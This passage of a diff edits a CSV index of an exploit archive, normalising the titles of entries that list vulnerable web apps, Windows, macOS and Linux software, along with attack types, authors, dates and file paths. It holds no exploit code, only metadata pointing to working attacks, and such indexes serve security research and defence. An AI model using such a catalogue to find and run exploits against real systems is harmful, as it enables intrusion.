Scripting",2012-04-04,"High-Tech Bridge SA",php,webapps,0 37046,platforms/php/webapps/37046.txt,"osCMax 2.5 - admin/new_attributes_include.php Multiple Parameter Cross-Site Scripting",2012-04-04,"High-Tech Bridge SA",php,webapps,0 -37047,platforms/php/webapps/37047.html,"osCMax 2.5 - admin/login.php username Parameter SQL Injection",2012-04-04,"High-Tech Bridge SA",php,webapps,0 +37047,platforms/php/webapps/37047.html,"osCMax 2.5 - admin/login.php 'Username' Parameter SQL Injection",2012-04-04,"High-Tech Bridge SA",php,webapps,0 37048,platforms/php/webapps/37048.txt,"osCMax 2.5 - admin/stats_monthly_sales.php status Parameter SQL Injection",2012-04-04,"High-Tech Bridge SA",php,webapps,0 37049,platforms/windows/local/37049.txt,"Microsoft Windows - Privilege Escalation (MS15-051)",2015-05-18,hfiref0x,windows,local,0 37050,platforms/php/webapps/37050.txt,"Chronosite 5.12 - SQL Injection",2015-05-18,Wadeek,php,webapps,0 @@ -33477,11 +33483,11 @@ id,file,description,date,author,platform,type,port 37088,platforms/linux/local/37088.c,"Apport (Ubuntu 14.04/14.10/15.04) - Race Condition Privilege Escalation",2015-05-23,rebel,linux,local,0 37089,platforms/linux/local/37089.txt,"Fuse 2.9.3-15 - Privilege Escalation",2015-05-23,"Tavis Ormandy",linux,local,0 37090,platforms/php/webapps/37090.txt,"Joomla! JA T3 Framework Component - Directory Traversal",2012-04-17,indoushka,php,webapps,0 -37091,platforms/php/webapps/37091.txt,"Acuity CMS 2.6.2 - 'UserName' Parameter Cross-Site Scripting",2012-04-17,"Aung Khant",php,webapps,0 +37091,platforms/php/webapps/37091.txt,"Acuity CMS 2.6.2 - ''Username'' Parameter Cross-Site Scripting",2012-04-17,"Aung Khant",php,webapps,0 37092,platforms/php/webapps/37092.txt,"XOOPS 2.5.4 - /modules/pm/pmlite.php to_userid Parameter Cross-Site Scripting",2012-04-18,"High-Tech Bridge SA",php,webapps,0 37093,platforms/php/webapps/37093.txt,"XOOPS 2.5.4 - /tiny_mce/plugins/xoopsimagemanager/xoopsimagebrowser.php Multiple Parameter Cross-Site Scripting",2012-04-18,"High-Tech Bridge SA",php,webapps,0 37094,platforms/php/webapps/37094.txt,"ownCloud 3.0.0 - 'index.php' redirect_url Parameter Arbitrary Site Redirect",2012-04-18,"Tobias Glemser",php,webapps,0 -37095,platforms/php/webapps/37095.txt,"Pendulab ChatBlazer 8.5 - 'username' Parameter Cross-Site Scripting",2012-04-20,sonyy,php,webapps,0 +37095,platforms/php/webapps/37095.txt,"Pendulab ChatBlazer 8.5 - ''Username'' Parameter Cross-Site Scripting",2012-04-20,sonyy,php,webapps,0 37096,platforms/php/webapps/37096.html,"Anchor CMS 0.6-14-ga85d0a0 - 'id' Parameter Multiple HTML Injection Vulnerabilities",2012-04-20,"Gjoko Krstic",php,webapps,0 37097,platforms/ios/remote/37097.py,"FTP Media Server 3.0 - Authentication Bypass / Denial of Service",2015-05-25,"Wh1t3Rh1n0 (Michael Allen)",ios,remote,0 37098,platforms/windows/local/37098.txt,"Microsoft Windows - Privilege Escalation (MS15-010)",2015-05-25,"Sky lake",windows,local,0 @@ -33538,7 +33544,7 @@ id,file,description,date,author,platform,type,port 37147,platforms/php/webapps/37147.txt,"Chevereto 1.91 - Upload/engine.php v Parameter Cross-Site Scripting",2012-05-10,AkaStep,php,webapps,0 37148,platforms/php/webapps/37148.txt,"Chevereto 1.91 - Upload/engine.php v Parameter Traversal Arbitrary File Enumeration",2012-05-10,AkaStep,php,webapps,0 37149,platforms/windows/dos/37149.py,"Private Shell SSH Client 3.3 - Crash (PoC)",2015-05-29,3unnym00n,windows,dos,22 -37197,platforms/windows/local/37197.py,"Jildi FTP Client 1.5.6 - (SEH) Buffer Overflow",2015-06-04,"Zahid Adeel",windows,local,0 +37197,platforms/windows/local/37197.py,"Jildi FTP Client 1.5.6 - Buffer Overflow (SEH)",2015-06-04,"Zahid Adeel",windows,local,0 37151,platforms/php/webapps/37151.txt,"TCPDF Library 5.9 - Arbitrary File Deletion",2015-05-29,"Filippo Roncari",php,webapps,80 37170,platforms/hardware/remote/37170.rb,"Airties - login-cgi Buffer Overflow",2015-06-01,Metasploit,hardware,remote,0 37154,platforms/hardware/webapps/37154.rb,"ESC 8832 Data Controller - Multiple Vulnerabilities",2015-05-29,"Balazs Makany",hardware,webapps,80 @@ -33552,7 +33558,7 @@ id,file,description,date,author,platform,type,port 37162,platforms/php/webapps/37162.txt,"Dynamic Widgets WordPress Plugin 1.5.1 - 'themes.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37163,platforms/windows/remote/37163.py,"IBM Security AppScan Standard 9.0.2 - OLE Automation Array Remote Code Execution",2015-06-01,"Naser Farhadi",windows,remote,0 37165,platforms/windows/remote/37165.py,"WebDrive 12.2 (Build #4172) - Buffer Overflow (PoC)",2015-06-01,metacom,windows,remote,0 -37166,platforms/php/webapps/37166.php,"WordPress dzs-zoomsounds Plugins 2.0 - Remote File Upload",2015-06-01,"nabil chris",php,webapps,0 +37166,platforms/php/webapps/37166.php,"WordPress dzs-zoomsounds Plugins 2.0 - Arbitrary File Upload",2015-06-01,"nabil chris",php,webapps,0 37167,platforms/linux/local/37167.c,"PonyOS 3.0 - VFS Permissions Exploit",2015-06-01,"Hacker Fantastic",linux,local,0 37168,platforms/linux/local/37168.txt,"PonyOS 3.0 - ELF Loader Privilege Escalation",2015-06-01,"Hacker Fantastic",linux,local,0 37171,platforms/hardware/remote/37171.rb,"D-Link Devices - HNAP SOAPAction-Header Command Execution",2015-06-01,Metasploit,hardware,remote,0 @@ -33590,7 +33596,7 @@ id,file,description,date,author,platform,type,port 37206,platforms/php/webapps/37206.txt,"SiliSoftware PHPThumb() 1.7.11-201108081537 - demo/PHPThumb.demo.showpic.php title Parameter Cross-Site Scripting",2012-05-16,"Gjoko Krstic",php,webapps,0 37207,platforms/php/webapps/37207.txt,"SiliSoftware PHPThumb() 1.7.11-201108081537 - demo/PHPThumb.demo.random.php dir Parameter Cross-Site Scripting",2012-05-16,"Gjoko Krstic",php,webapps,0 37208,platforms/php/webapps/37208.txt,"backupDB() 1.2.7a - 'onlyDB' Parameter Cross-Site Scripting",2012-05-16,LiquidWorm,php,webapps,0 -37209,platforms/php/webapps/37209.txt,"WordPress Really Simple Guest Post 1.0.6 Plugin - File Include",2015-06-05,Kuroi'SH,php,webapps,0 +37209,platforms/php/webapps/37209.txt,"WordPress Really Simple Guest Post 1.0.6 Plugin - File Inclusion",2015-06-05,Kuroi'SH,php,webapps,0 37211,platforms/windows/local/37211.html,"1 Click Audio Converter 2.3.6 - Activex Buffer Overflow",2015-06-05,metacom,windows,local,0 37212,platforms/windows/local/37212.html,"1 Click Extract Audio 2.3.6 - Activex Buffer Overflow",2015-06-05,metacom,windows,local,0 37213,platforms/ios/webapps/37213.txt,"WiFi HD 8.1 - Directory Traversal / Denial of Service",2015-06-06,"Wh1t3Rh1n0 (Michael Allen)",ios,webapps,0 @@ -33602,11 +33608,11 @@ id,file,description,date,author,platform,type,port 37219,platforms/php/webapps/37219.txt,"PHP Address Book 7.0 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-17,"Stefan Schurtz",php,webapps,0 37220,platforms/jsp/webapps/37220.txt,"OpenKM 5.1.7 - Cross-Site Request Forgery",2012-05-03,"Cyrill Brunschwiler",jsp,webapps,0 37221,platforms/jsp/webapps/37221.txt,"Atlassian JIRA FishEye 2.5.7 / Crucible 2.5.7 Plugins - XML Parsing Unspecified Security",2012-05-17,anonymous,jsp,webapps,0 -37222,platforms/asp/webapps/37222.txt,"Acuity CMS 2.6.2 - /admin/file_manager/file_upload_submit.asp Multiple Parameter File Upload ASP Code Execution",2012-05-21,"Aung Khant",asp,webapps,0 +37222,platforms/asp/webapps/37222.txt,"Acuity CMS 2.6.2 - (ASP ) '/admin/file_manager/file_upload_submit.asp' Multiple Parameter File Upload / Code Execution",2012-05-21,"Aung Khant",asp,webapps,0 37223,platforms/asp/webapps/37223.txt,"Acuity CMS 2.6.2 - '/admin/file_manager/browse.asp' path Parameter Traversal Arbitrary File Access",2012-05-21,"Aung Khant",asp,webapps,0 37224,platforms/php/webapps/37224.txt,"Yandex.Server 2010 9.0 - 'text' Parameter Cross-Site Scripting",2012-05-21,MustLive,php,webapps,0 37225,platforms/php/webapps/37225.pl,"Concrete CMS < 5.5.21 - Multiple Security Vulnerabilities",2012-05-20,AkaStep,php,webapps,0 -37226,platforms/php/webapps/37226.txt,"Concrete5 FlashUploader - Arbitrary SWF File Upload",2012-05-20,AkaStep,php,webapps,0 +37226,platforms/php/webapps/37226.txt,"Concrete5 FlashUploader - Arbitrary '.SWF' File Upload",2012-05-20,AkaStep,php,webapps,0 37227,platforms/php/webapps/37227.txt,"Concrete5 - index.php/tools/required/files/replace searchInstance Parameter Cross-Site Scripting",2012-05-20,AkaStep,php,webapps,0 37228,platforms/php/webapps/37228.txt,"Concrete5 - index.php/tools/required/files/add_to searchInstance Parameter Cross-Site Scripting",2012-05-20,AkaStep,php,webapps,0 37229,platforms/php/webapps/37229.txt,"Concrete5 - index.php/tools/required/files/Permissions searchInstance Parameter Cross-Site Scripting",2012-05-20,AkaStep,php,webapps,0 @@ -33625,7 +33631,7 @@ id,file,description,date,author,platform,type,port 37243,platforms/php/webapps/37243.txt,"WordPress Wp-ImageZoom 1.1.0 Plugin - Multiple Vulnerabilities",2015-06-08,T3N38R15,php,webapps,80 37244,platforms/php/webapps/37244.txt,"WordPress Plugin 'WP Mobile Edition' - Local File Inclusion",2015-06-08,"Ali Khalil",php,webapps,0 37245,platforms/php/webapps/37245.txt,"Pasworld - detail.php Blind SQL Injection",2015-06-08,"Sebastian khan",php,webapps,0 -37266,platforms/php/webapps/37266.txt,"ClickHeat 1.14 - Change Admin Password Cross-Site Request Forgery",2015-06-12,"David Shanahan",php,webapps,80 +37266,platforms/php/webapps/37266.txt,"ClickHeat 1.14 - (Change Admin Password) Cross-Site Request Forgery",2015-06-12,"David Shanahan",php,webapps,80 37249,platforms/linux/dos/37249.py,"Libmimedir - '.VCF' Memory Corruption (PoC)",2015-06-10,"Jeremy Brown",linux,dos,0 37250,platforms/xml/webapps/37250.txt,"HP WebInspect 10.4 - XML External Entity Injection",2015-06-10,"Jakub Palaczynski",xml,webapps,0 39479,platforms/ios/webapps/39479.txt,"InstantCoder 1.0 iOS - Multiple Vulnerabilities",2016-02-22,Vulnerability-Lab,ios,webapps,0 @@ -33647,7 +33653,7 @@ id,file,description,date,author,platform,type,port 37314,platforms/php/webapps/37314.txt,"Yellow Duck Framework 2.0 Beta1 - Local File Disclosure",2012-05-23,L3b-r1'z,php,webapps,0 37315,platforms/php/webapps/37315.txt,"PHPCollab 2.5 - uploadfile.php Crafted Request Arbitrary Non-PHP File Upload",2012-05-24,"team ' and 1=1--",php,webapps,0 37257,platforms/php/webapps/37257.txt,"FiverrScript - Cross-Site Request Forgery (Add New Admin)",2015-06-10,"Mahmoud Gamal",php,webapps,80 -37258,platforms/hardware/webapps/37258.py,"GeoVision (GeoHttpServer) Webcams - Remote File Disclosure Exploit",2015-06-10,"Viktor Minin",hardware,webapps,0 +37258,platforms/hardware/webapps/37258.py,"GeoVision (GeoHttpServer) Webcams - Remote File Disclosure",2015-06-10,"Viktor Minin",hardware,webapps,0 37259,platforms/php/webapps/37259.txt,"ISPConfig 3.0.5.4p6 - Multiple Vulnerabilities",2015-06-10,"High-Tech Bridge SA",php,webapps,443 37260,platforms/jsp/webapps/37260.txt,"Bonita BPM 6.5.1 - Multiple Vulnerabilities",2015-06-10,"High-Tech Bridge SA",jsp,webapps,8080 37261,platforms/hardware/webapps/37261.txt,"Alcatel-Lucent OmniSwitch - Cross-Site Request Forgery",2015-06-10,"RedTeam Pentesting",hardware,webapps,80 @@ -33705,7 +33711,7 @@ id,file,description,date,author,platform,type,port 37337,platforms/php/webapps/37337.txt,"WHMCompleteSolution (WHMCS) 5.0 - Multiple Application Function Cross-Site Request Forgery",2012-05-31,"Shadman Tanjim",php,webapps,0 37338,platforms/php/webapps/37338.txt,"WHMCompleteSolution - (WHMCS) 5.0 'KnowledgeBase.php' search Parameter Cross-Site Scripting",2012-05-31,"Shadman Tanjim",php,webapps,0 37339,platforms/php/webapps/37339.txt,"VoipNow Professional 2.5.3 - 'nsextt' Parameter Cross-Site Scripting",2012-06-01,Aboud-el,php,webapps,0 -37340,platforms/php/webapps/37340.html,"TinyCMS 1.3 - File Upload Cross-Site Request Forgery",2012-06-03,KedAns-Dz,php,webapps,0 +37340,platforms/php/webapps/37340.html,"TinyCMS 1.3 - Arbitrary File Upload / Cross-Site Request Forgery",2012-06-03,KedAns-Dz,php,webapps,0 37341,platforms/php/webapps/37341.txt,"TinyCMS 1.3 - 'index.php' page Parameter Traversal Local File Inclusion",2012-06-03,KedAns-Dz,php,webapps,0 37342,platforms/php/webapps/37342.txt,"TinyCMS 1.3 - admin/admin.php do Parameter Traversal Local File Inclusion",2012-06-03,KedAns-Dz,php,webapps,0 37816,platforms/multiple/webapps/37816.txt,"Cisco Unified Communications Manager - Multiple Vulnerabilities",2015-08-18,"Bernhard Mueller",multiple,webapps,0 @@ -33742,7 +33748,7 @@ id,file,description,date,author,platform,type,port 37382,platforms/php/webapps/37382.php,"Joomla! jFancy Component - 'script.php' Arbitrary File Upload",2012-06-13,"Sammy FORGIT",php,webapps,0 37383,platforms/php/webapps/37383.php,"Joomla! Easy Flash Uploader Component - 'helper.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0 37384,platforms/lin_x86/shellcode/37384.c,"Linux/x86 - execve /bin/sh Shellcode (23 bytes)",2015-06-26,"Bill Borskey",lin_x86,shellcode,0 -37386,platforms/osx/dos/37386.php,"Apple Mac OS X 10.10.3 (Yosemite) Safari 8.0.x - Crash (PoC)",2015-06-26,"Mohammad Reza Espargham",osx,dos,0 +37386,platforms/osx/dos/37386.php,"Apple Mac OSX 10.10.3 (Yosemite) Safari 8.0.x - Crash (PoC)",2015-06-26,"Mohammad Reza Espargham",osx,dos,0 37387,platforms/php/webapps/37387.txt,"Koha 3.20.1 - Multiple SQL Injections",2015-06-26,"Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos",php,webapps,0 37388,platforms/php/webapps/37388.txt,"Koha 3.20.1 - Directory Traversal",2015-06-26,"Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos",php,webapps,0 37389,platforms/php/webapps/37389.txt,"Koha 3.20.1 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities",2015-06-26,"Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos",php,webapps,0 @@ -33849,7 +33855,7 @@ id,file,description,date,author,platform,type,port 37563,platforms/php/webapps/37563.html,"WordPress G-Lock Double Opt-in Manager Plugin - SQL Injection",2012-08-01,BEASTIAN,php,webapps,0 37492,platforms/ios/webapps/37492.txt,"WK UDID 1.0.1 iOS - Command Inject",2015-07-05,Vulnerability-Lab,ios,webapps,0 37534,platforms/php/webapps/37534.txt,"WordPress Easy2Map Plugin 1.24 - SQL Injection",2015-07-08,"Larry W. Cashdollar",php,webapps,80 -37535,platforms/windows/local/37535.txt,"Blueberry Express 5.9.0.3678 - SEH Buffer Overflow",2015-07-08,Vulnerability-Lab,windows,local,0 +37535,platforms/windows/local/37535.txt,"Blueberry Express 5.9.0.3678 - Buffer Overflow (SEH)",2015-07-08,Vulnerability-Lab,windows,local,0 37494,platforms/php/webapps/37494.txt,"WordPress S3Bubble Cloud Video With Adverts & Analytics 0.7 Plugin - Arbitrary File Download",2015-07-05,CrashBandicot,php,webapps,0 37495,platforms/lin_x86/shellcode/37495.py,"Linux/x86 - /bin/sh ROT7 Encoded Shellcode",2015-07-05,"Artem T",lin_x86,shellcode,0 37500,platforms/php/webapps/37500.txt,"Funeral Script PHP - Cross-Site Scripting / SQL Injection",2012-06-17,snup,php,webapps,0 @@ -33956,7 +33962,7 @@ id,file,description,date,author,platform,type,port 37612,platforms/windows/dos/37612.py,"ZOC Terminal Emulator 7 - (Quick Connection) Crash (PoC)",2015-07-14,"SATHISH ARTHAR",windows,dos,0 37613,platforms/php/webapps/37613.txt,"PHPList 2.10.18 - 'index.php' SQL Injection",2012-08-08,"High-Tech Bridge SA",php,webapps,0 37614,platforms/php/webapps/37614.txt,"PBBoard - 'index.php' Multiple Parameter SQL Injection",2012-08-08,"High-Tech Bridge",php,webapps,0 -37615,platforms/php/webapps/37615.txt,"PBBoard - member_id Parameter Validation Password manipulation",2012-08-08,"High-Tech Bridge",php,webapps,0 +37615,platforms/php/webapps/37615.txt,"PBBoard - member_id Parameter Validation Password Manipulation",2012-08-08,"High-Tech Bridge",php,webapps,0 37616,platforms/php/webapps/37616.txt,"PBBoard - admin.php xml_name Parameter Arbitrary PHP Code Execution",2012-08-08,"High-Tech Bridge",php,webapps,0 37617,platforms/php/webapps/37617.txt,"dirLIST - Multiple Local File Inclusion / Arbitrary File Upload Vulnerabilities",2012-08-08,L0n3ly-H34rT,php,webapps,0 37664,platforms/win_x86/shellcode/37664.c,"Win32/XP SP3 (TR) - MessageBox Shellcode (24 bytes)",2015-07-21,B3mB4m,win_x86,shellcode,0 @@ -34004,7 +34010,7 @@ id,file,description,date,author,platform,type,port 37667,platforms/java/remote/37667.rb,"SysAid Help Desk 'rdslogs' - Arbitrary File Upload",2015-07-21,Metasploit,java,remote,0 37668,platforms/windows/remote/37668.php,"Internet Download Manager - OLE Automation Array Remote Code Execution",2015-07-21,"Mohammad Reza Espargham",windows,remote,0 37669,platforms/windows/dos/37669.pl,"Counter-Strike 1.6 - 'GameInfo' Query Reflection Denial of Service (PoC)",2015-07-22,"Todor Donev",windows,dos,0 -37670,platforms/osx/local/37670.sh,"Apple Mac OS X 10.10 - DYLD_PRINT_TO_FILE Privilege Escalation",2015-07-22,"Stefan Esser",osx,local,0 +37670,platforms/osx/local/37670.sh,"Apple Mac OSX 10.10 - DYLD_PRINT_TO_FILE Privilege Escalation",2015-07-22,"Stefan Esser",osx,local,0 37671,platforms/multiple/remote/37671.txt,"Websense Content Gateway - Multiple Cross-Site Scripting Vulnerabilities",2012-08-23,"Steven Sim Kok Leong",multiple,remote,0 37672,platforms/php/webapps/37672.txt,"JW Player - 'logo.link' Parameter Cross-Site Scripting",2012-08-29,MustLive,php,webapps,0 37673,platforms/windows/dos/37673.html,"Microsoft Indexing Service - 'ixsso.dll' ActiveX Control Denial of Service",2012-08-24,coolkaveh,windows,dos,0 @@ -34036,7 +34042,7 @@ id,file,description,date,author,platform,type,port 37700,platforms/multiple/webapps/37700.txt,"Hawkeye-G 3.0.1.4912 - Persistent Cross-Site Scripting / Information Leakage",2015-07-27,hyp3rlinx,multiple,webapps,0 37706,platforms/linux/dos/37706.txt,"Libuser Library - Multiple Vulnerabilities",2015-07-27,"Qualys Corporation",linux,dos,0 37737,platforms/windows/local/37737.rb,"Heroes of Might and Magic III - '.h3m' Map file Buffer Overflow",2015-08-07,Metasploit,windows,local,0 -37825,platforms/osx/local/37825.txt,"Apple Mac OS X 10.10.5 - XNU Privilege Escalation",2015-08-18,kpwn,osx,local,0 +37825,platforms/osx/local/37825.txt,"Apple Mac OSX 10.10.5 - XNU Privilege Escalation",2015-08-18,kpwn,osx,local,0 37826,platforms/php/webapps/37826.txt,"WordPress 3.4.2 - Multiple Path Disclosure Vulnerabilities",2012-09-18,AkaStep,php,webapps,0 37751,platforms/php/webapps/37751.txt,"WordPress WPTF Image Gallery 1.03 Plugin - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80 37752,platforms/php/webapps/37752.txt,"WordPress Recent Backups Plugin 0.7 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80 @@ -34063,19 +34069,19 @@ id,file,description,date,author,platform,type,port 37726,platforms/php/webapps/37726.txt,"PHP News Script 4.0.0 - SQL Injection",2015-08-07,"Meisam Monsef",php,webapps,80 37727,platforms/windows/dos/37727.py,"Python IDLE 2.7.8 - Crash (PoC)",2015-08-07,"Hadi Zomorodi Monavar",windows,dos,0 37728,platforms/php/dos/37728.py,"OSSEC WUI 0.8 - Denial of Service",2015-08-07,"Milad Saber",php,dos,0 -37729,platforms/windows/remote/37729.py,"FileZilla Client 2.2.x - SEH Buffer Overflow",2015-08-07,ly0n,windows,remote,0 -37730,platforms/windows/local/37730.py,"Tomabo MP4 Player 3.11.3 - '.m3u' SEH Buffer Overflow",2015-08-07,"Saeid Atabaki",windows,local,0 +37729,platforms/windows/remote/37729.py,"FileZilla Client 2.2.x - Buffer Overflow (SEH)",2015-08-07,ly0n,windows,remote,0 +37730,platforms/windows/local/37730.py,"Tomabo MP4 Player 3.11.3 - '.m3u' Buffer Overflow (SEH)",2015-08-07,"Saeid Atabaki",windows,local,0 37731,platforms/windows/remote/37731.py,"PCMan FTP Server 2.0.7 - PUT Command Buffer Overflow",2015-08-07,"Jay Turla",windows,remote,21 37732,platforms/win_x86/local/37732.c,"Microsoft Windows XP SP3 x86 / 2003 SP2 (x86) - 'NDProxy' Privilege Escalation (MS14-002)",2015-08-07,"Tomislav Paskalev",win_x86,local,0 37734,platforms/php/webapps/37734.html,"Microweber 1.0.3 - Persistent Cross-Site Scripting / Cross-Site Request Forgery (Add Admin)",2015-08-07,LiquidWorm,php,webapps,80 -37735,platforms/php/webapps/37735.txt,"Microweber 1.0.3 - File Upload Filter Bypass Remote PHP Code Execution",2015-08-07,LiquidWorm,php,webapps,80 +37735,platforms/php/webapps/37735.txt,"Microweber 1.0.3 - Arbitrary File Upload Filter Bypass Remote PHP Code Execution",2015-08-07,LiquidWorm,php,webapps,80 37747,platforms/windows/dos/37747.py,"Havij Pro - Crash (PoC)",2015-08-10,i_7e1,windows,dos,0 37753,platforms/php/webapps/37753.txt,"WordPress Simple Image Manipulator Plugin 1.0 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80 37738,platforms/php/webapps/37738.txt,"WordPress Job Manager Plugin 0.7.22 - Persistent Cross-Site Scripting",2015-08-07,"Owais Mehtab",php,webapps,80 37739,platforms/windows/dos/37739.py,"Dell Netvault Backup 10.0.1.24 - Denial of Service",2015-08-07,"Josep Pi Rodriguez",windows,dos,20031 38106,platforms/aix/local/38106.txt,"IBM AIX High Availability Cluster Multiprocessing (HACMP) - Privilege Escalation",2015-09-08,"Kristian Erik Hermansen",aix,local,0 38107,platforms/windows/local/38107.c,"Cisco Sourcefire User Agent 2.2 - Insecure File Permissions",2015-09-08,"Glafkos Charalambous ",windows,local,0 -37741,platforms/osx/dos/37741.txt,"Apple Mac OS X Keychain - EXC_BAD_ACCESS Denial of Service",2015-08-08,"Juan Sacco",osx,dos,0 +37741,platforms/osx/dos/37741.txt,"Apple Mac OSX Keychain - EXC_BAD_ACCESS Denial of Service",2015-08-08,"Juan Sacco",osx,dos,0 37824,platforms/php/webapps/37824.txt,"WordPress WP Symposium Plugin 15.1 - 'get_album_item.php' SQL Injection",2015-08-18,PizzaHatHacker,php,webapps,80 37743,platforms/linux/dos/37743.pl,"Brasero - Crash (PoC)",2015-08-08,"Mohammad Reza Espargham",linux,dos,0 37744,platforms/php/webapps/37744.txt,"WordPress Video Gallery 2.7 Plugin - SQL Injection",2015-08-09,"Kacper Szurek",php,webapps,0 @@ -34148,7 +34154,7 @@ id,file,description,date,author,platform,type,port 37807,platforms/php/webapps/37807.txt,"vBulletin 4.1.12 - 'blog_plugin_useradmin.php' SQL Injection",2012-09-18,Am!r,php,webapps,0 37808,platforms/windows/remote/37808.py,"Easy File Management Web Server 5.6 - USERID Remote Buffer Overflow",2015-08-18,"Tracy Turben",windows,remote,0 37809,platforms/php/webapps/37809.php,"Nuts CMS - Remote PHP Code Injection / Execution",2015-08-17,"Yakir Wizman",php,webapps,80 -37810,platforms/windows/dos/37810.txt,"FTP Commander 8.02 - SEH Overwrite",2015-08-18,Un_N0n,windows,dos,0 +37810,platforms/windows/dos/37810.txt,"FTP Commander 8.02 - Overwrite (SEH)",2015-08-18,Un_N0n,windows,dos,0 37811,platforms/php/webapps/37811.py,"Magento CE < 1.9.0.1 - Post-Authentication Remote Code Execution",2015-08-18,Ebrietas0,php,webapps,80 37812,platforms/win_x86/remote/37812.rb,"Symantec Endpoint Protection Manager - Authentication Bypass / Code Execution",2015-08-18,Metasploit,win_x86,remote,8443 37813,platforms/windows/local/37813.rb,"VideoCharge Studio - Buffer Overflow (SEH)",2015-08-18,Metasploit,windows,local,0 @@ -34221,7 +34227,7 @@ id,file,description,date,author,platform,type,port 37883,platforms/windows/dos/37883.txt,"Adobe Flash AS2 - textfield.filters Use-After-Free (3)",2015-08-19,bilou,windows,dos,0 37884,platforms/windows/dos/37884.txt,"Adobe Flash - Heap Use-After-Free in SurfaceFilterList::C​reateFromScriptAtom",2015-08-19,bilou,windows,dos,0 37885,platforms/php/webapps/37885.html,"up.time 7.5.0 - Superadmin Privilege Escalation",2015-08-19,LiquidWorm,php,webapps,9999 -37886,platforms/php/webapps/37886.txt,"up.time 7.5.0 - Cross-Site Scripting / Cross-Site Request Forgery Add Admin Exploit",2015-08-19,LiquidWorm,php,webapps,9999 +37886,platforms/php/webapps/37886.txt,"up.time 7.5.0 - Cross-Site Scripting / Cross-Site Request Forgery Add Admin",2015-08-19,LiquidWorm,php,webapps,9999 37887,platforms/php/webapps/37887.txt,"up.time 7.5.0 - Arbitrary File Disclose And Delete Exploit",2015-08-19,LiquidWorm,php,webapps,9999 37888,platforms/php/webapps/37888.txt,"up.time 7.5.0 - Upload And Execute File Exploit",2015-08-19,LiquidWorm,php,webapps,9999 37889,platforms/linux/remote/37889.txt,"YingZhiPython - Directory Traversal / Arbitrary File Upload",2012-09-26,"Larry Cashdollar",linux,remote,0 @@ -34265,7 +34271,7 @@ id,file,description,date,author,platform,type,port 37927,platforms/php/webapps/37927.txt,"Netsweeper 4.0.4 - SQL Injection",2015-08-21,"Anastasios Monachos",php,webapps,0 37928,platforms/php/webapps/37928.txt,"Netsweeper 4.0.8 - SQL Injection Authentication Bypass",2015-08-21,"Anastasios Monachos",php,webapps,0 37929,platforms/php/webapps/37929.txt,"Netsweeper 4.0.8 - Authentication Bypass Issue",2015-08-21,"Anastasios Monachos",php,webapps,0 -37930,platforms/php/webapps/37930.txt,"Netsweeper 4.0.9 - Arbitrary File Upload And Execution",2015-08-21,"Anastasios Monachos",php,webapps,0 +37930,platforms/php/webapps/37930.txt,"Netsweeper 4.0.9 - Arbitrary File Upload and Execution",2015-08-21,"Anastasios Monachos",php,webapps,0 37931,platforms/php/webapps/37931.txt,"Netsweeper 3.0.6 - Authentication Bypass",2015-08-21,"Anastasios Monachos",php,webapps,0 37932,platforms/php/webapps/37932.txt,"Netsweeper 4.0.8 - Arbitrary File Upload and Execution",2015-08-21,"Anastasios Monachos",php,webapps,0 37933,platforms/php/webapps/37933.txt,"Netsweeper 4.0.8 - Authentication Bypass",2015-08-21,"Anastasios Monachos",php,webapps,0 @@ -34274,7 +34280,7 @@ id,file,description,date,author,platform,type,port 37936,platforms/php/webapps/37936.txt,"Open Realty - 'select_users_lang' Parameter Local File Inclusion",2012-10-06,L0n3ly-H34rT,php,webapps,0 37952,platforms/windows/remote/37952.py,"Easy Address Book Web Server 1.6 - USERID Remote Buffer Overflow",2015-08-24,"Tracy Turben",windows,remote,0 37954,platforms/windows/dos/37954.py,"Mock SMTP Server 1.0 - Remote Crash (PoC)",2015-08-24,"Shankar Damodaran",windows,dos,25 -37955,platforms/php/webapps/37955.html,"Pligg CMS 2.0.2 - Cross-Site Request Forgery (Add Admin) Exploit",2015-08-24,"Arash Khazaei",php,webapps,80 +37955,platforms/php/webapps/37955.html,"Pligg CMS 2.0.2 - Cross-Site Request Forgery (Add Admin)",2015-08-24,"Arash Khazaei",php,webapps,80 37956,platforms/php/webapps/37956.txt,"WordPress GeoPlaces3 Theme - Arbitrary File Upload",2015-08-24,Mdn_Newbie,php,webapps,80 37957,platforms/windows/dos/37957.txt,"GOM Audio 2.0.8 - '.gas' Crash (PoC)",2015-08-24,Un_N0n,windows,dos,0 37958,platforms/multiple/remote/37958.rb,"Firefox - pdf.js Privileged JavaScript Injection",2015-08-24,Metasploit,multiple,remote,0 @@ -34318,7 +34324,7 @@ id,file,description,date,author,platform,type,port 37997,platforms/ios/dos/37997.txt,"Photo Transfer (2) 1.0 iOS - Denial of Service",2015-08-28,Vulnerability-Lab,ios,dos,3030 37998,platforms/php/webapps/37998.txt,"WordPress Responsive Thumbnail Slider Plugin 1.0 - Arbitrary File Upload",2015-08-28,"Arash Khazaei",php,webapps,80 37999,platforms/java/webapps/37999.txt,"Jenkins 1.626 - Cross-Site Request Forgery / Code Execution",2015-08-28,smash,java,webapps,0 -38000,platforms/php/webapps/38000.txt,"Wolf CMS - Arbitrary File Upload To Command Execution",2015-08-28,"Narendra Bhati",php,webapps,80 +38000,platforms/php/webapps/38000.txt,"Wolf CMS - Arbitrary File Upload and Execution",2015-08-28,"Narendra Bhati",php,webapps,80 38002,platforms/php/webapps/38002.txt,"Pluck CMS 4.7.3 - Multiple Vulnerabilities",2015-08-28,smash,php,webapps,80 38003,platforms/windows/remote/38003.py,"PCMan FTP Server 2.0.7 - GET Command Buffer Overflow",2015-08-29,Koby,windows,remote,21 38004,platforms/hardware/webapps/38004.txt,"Samsung SyncThruWeb 2.01.00.26 - SMB Hash Disclosure",2015-08-29,"Shad Malloy",hardware,webapps,80 @@ -34345,14 +34351,14 @@ id,file,description,date,author,platform,type,port 38025,platforms/php/webapps/38025.txt,"Omni-Secure - 'dir' Parameter Multiple File Disclosure Vulnerabilities",2012-11-19,HaCkeR_EgY,php,webapps,0 